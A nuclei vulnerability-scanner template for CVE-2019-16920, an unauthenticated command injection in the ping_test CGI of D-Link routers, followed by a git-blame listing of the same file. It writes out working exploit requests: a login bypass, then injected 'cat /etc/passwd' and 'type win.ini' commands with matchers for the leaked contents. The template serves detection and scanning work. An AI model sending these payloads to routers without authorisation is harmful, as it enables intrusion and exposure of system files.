nuclei-templates/cves/2019/CVE-2019-16920.yaml

id: CVE-2019-16920

info:
  name: Unauthenticated Multiple D-Link Routers RCE
  author: dwisiswant0
  severity: critical
  description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
  reference: https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
  tags: cve,cve2019,dlink,rce
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2019-16920
    cwe-id: CWE-78

requests:
  - raw:
      - |
        POST /apply_sec.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384
      - |
        POST /apply_sec.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}/login_pic.asp
        Cookie: uid=1234123

        html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}
      - |
        POST /apply_sec.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}/login_pic.asp
        Cookie: uid=1234123

        html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

        part: body
      - type: status
        status:
          - 200
misc changes 2021-01-02 04:59:06 +00:00			`id: CVE-2019-16920`
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00
			`info:`
			`name: Unauthenticated Multiple D-Link Routers RCE`
			`author: dwisiswant0`
			`severity: critical`
			`description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`reference: https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r`
			`tags: cve,cve2019,dlink,rce`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.80`
			`cve-id: CVE-2019-16920`
			`cwe-id: CWE-78`
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /apply_sec.cgi HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
removed extra headers not required for template 2021-09-08 12:17:19 +00:00			`Referer: {{BaseURL}}`
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00
			`html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384`
			`- \|`
			`POST /apply_sec.cgi HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
removed extra headers not required for template 2021-09-08 12:17:19 +00:00			`Referer: {{BaseURL}}/login_pic.asp`
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00			`Cookie: uid=1234123`

			`html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}`
			`- \|`
			`POST /apply_sec.cgi HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
removed extra headers not required for template 2021-09-08 12:17:19 +00:00			`Referer: {{BaseURL}}/login_pic.asp`
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00			`Cookie: uid=1234123`

			`html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}}`
removed extra headers not required for template 2021-09-08 12:17:19 +00:00
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
matcher update to handle edge cases 2021-07-24 21:35:55 +00:00			`- "root:.*:0:0:"`
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00			`- "\\[(font\|extension\|file)s\\]"`
			`condition: or`
removed extra headers not required for template 2021-09-08 12:17:19 +00:00
:fire: Add CVE-2019-16920 2020-10-01 08:21:26 +00:00			`part: body`
			`- type: status`
			`status:`
			`- 200`